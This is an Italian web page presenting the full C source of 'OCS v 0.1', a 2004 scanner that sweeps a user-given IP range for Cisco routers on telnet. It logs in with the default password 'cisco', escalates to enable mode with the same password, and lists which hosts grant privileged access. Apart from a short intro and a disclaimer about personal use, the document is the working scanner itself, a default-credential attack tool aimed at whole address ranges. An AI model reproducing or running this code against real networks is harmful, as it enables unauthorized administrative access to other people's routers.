Scanner in versione beta per vulnerabilità router Cisco. Per ora testa le password di telnet e di enable mode di default. OverIP, AreaNetworking.IT e chi per essa non se ne assume responsabilità dell’uso fatto.
/* Author: OverIP Source: OCS v 0.1 License: GPL This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. Email: Write me for any problem or suggestion at: [email protected] Date: 09/08/2004 Read me: Just compile it with: gcc ocs.c -o ocs -lpthread Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy xxx.xxx.xxx.xxx=range start IP yyy.yyy.yyy.yyy=range end IP PAY ATTENTION: This source is coded for only personal use on your own router Cisco. Don't hack around. Special thanks very much: To Khlero with your patience this code is out there :* To Shen139, without you I can't live :D To all people that had betatesting this code :) AreaNetworking.IT - Networking Italian Portal I love U all :**** */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/ioctl.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> #include <signal.h> int i=0; int j=0; int k=0; int l=0; char buffer_a[700]; char buffer_b[700]; char buffer_c[700]; char tmpIP[16]; pthread_t threadname; void callScan() // scanning { scanna(tmpIP); pthread_exit(0); } static void funcAlarm() //alarm { pthread_exit(0); } int setnonblock(int sock) //setta socket non bloccanti { struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout))) return 0; return 1; } void init(struct sockaddr_in *address,int port,int IP) { address->sin_family=AF_INET; address->sin_port=htons((u_short)port); address->sin_addr.s_addr=IP; } int scanna(char*rangeIP) //scanning { int error; int sd; struct sockaddr_in server; close(sd); server.sin_family=AF_INET; server.sin_port=htons(23); server.sin_addr.s_addr=inet_addr(rangeIP); sd=socket(AF_INET,SOCK_STREAM,0); if(sd==-1) { printf("Socket Error(%s)\n",rangeIP); close(sd); pthread_exit(0); } // setnonblock(sd); signal(SIGALRM,funcAlarm); alarm(7); fflush(stdout); error=connect(sd,(struct sockaddr*)&server,sizeof(server)); if(error==0) { printf("\n\n-%s\n",rangeIP); fflush(stdout); memset(buffer_c, '\0',700); recv(sd,buffer_c,700,0); printf(" |Logging... %s\n",rangeIP); fflush(stdout); memset(buffer_a, '\0',700); memset(buffer_b, '\0',700); send(sd,"cisco\r",6,0); sleep(1); recv(sd,buffer_a,700,0); if(strstr(buffer_a,">")) { printf(" |Attenzione password telnet di default %s\n",rangeIP); fflush(stdout); send(sd,"enable\r",7,0); sleep(1); send(sd,"cisco\r",6,0); sleep(1); recv(sd,buffer_b,700,0); //printf(" Sto cercando di loggarmi in enable mode\n"); //fflush(stdout); } if(strstr(buffer_b,"#")) printf(" |Password telnet e enable mode di default! IP Router vulnerabile: %s\n\n\n", rangeIP); else printf(" |Router non vulnerabile\n"); fflush(stdout); } else { printf("\n\n(%s) Porte filtrate\n",rangeIP); close(sd); alarm(0); signal(SIGALRM,NULL); pthread_exit(0); } close(sd); fflush(stdout); alarm(0); signal(SIGALRM,NULL); pthread_exit(0); } char *getByte(char *IP,int index); int function1(char* IP, char* IP2) { char rangeIP[16]; pid_t pid; i=atoi(getByte(IP,1)); j=atoi(getByte(IP,2)); k=atoi(getByte(IP,3)); l=atoi(getByte(IP,4)); while(1) { sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l); strcpy(tmpIP,rangeIP); if(pthread_create(&threadname, NULL,callScan,NULL)!=0) { printf("+ Thread error:\n"); perror(" - pthread_create() "); exit(0); } fflush(stdout); pthread_join(threadname, NULL); fflush(stdout); l++; if (l==256) { l=0; k++; if (k==256) { k=0; j++; if (j==256) { j=0; i++; } } } if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4))) { break; } } sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l); strcpy(tmpIP,rangeIP); fflush(stdout); if(pthread_create(&threadname, NULL,callScan,NULL)!=0) { printf("+ Thread error:\n"); perror(" - pthread_create() "); exit(0); } pthread_join(threadname, NULL); fflush(stdout); } int main(int argc,char *argv[]) { int w; printf("********************************* OCS v 0.1 **********************************\n"); printf("**** ****\n"); printf("**** coded by OverIP ****\n"); printf("**** ****\n"); printf("**** under GPL License ****\n"); printf("**** ****\n"); printf("**** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy ****\n"); printf("**** ****\n"); printf("**** xxx.xxx.xxx.xxx = range start IP ****\n"); printf("**** yyy.yyy.yyy.yyy = range end IP ****\n"); printf("**** ****\n"); printf("******************************************************************************\n"); if(argc!=3) { printf("uso: %s IP IP\n",argv[0]); exit(-1); } for(w=1;w<=5;w++) if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255) { printf("uso: ./OCS IP IP\n"); exit (-1); } for(w=1;w<=5;w++) if(atoi(getByte(argv[1],w))<atoi(getByte(argv[2],w))) { function1(argv[1],argv[2]); return 0; } else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w))) { printf("uso: %s IP IP\n",argv[0]); return 0; } printf("IP uguali\n"); fflush(stdout); scanna(argv[1]); return 0; } char *getByte(char *IP,int index) { int i=0; int separator=0; static char byte[3]; for(i=0;i<4;i++) byte[i]='\0'; memset(byte,0,sizeof(byte)); for(i=0;i<strlen(IP);i++) { if((IP[i]=='.') && (separator==index-1)) { return byte; } else if(IP[i]=='.') { separator++; } else if (separator==index-1) { strncat(byte,&IP[i],1); } } return byte; }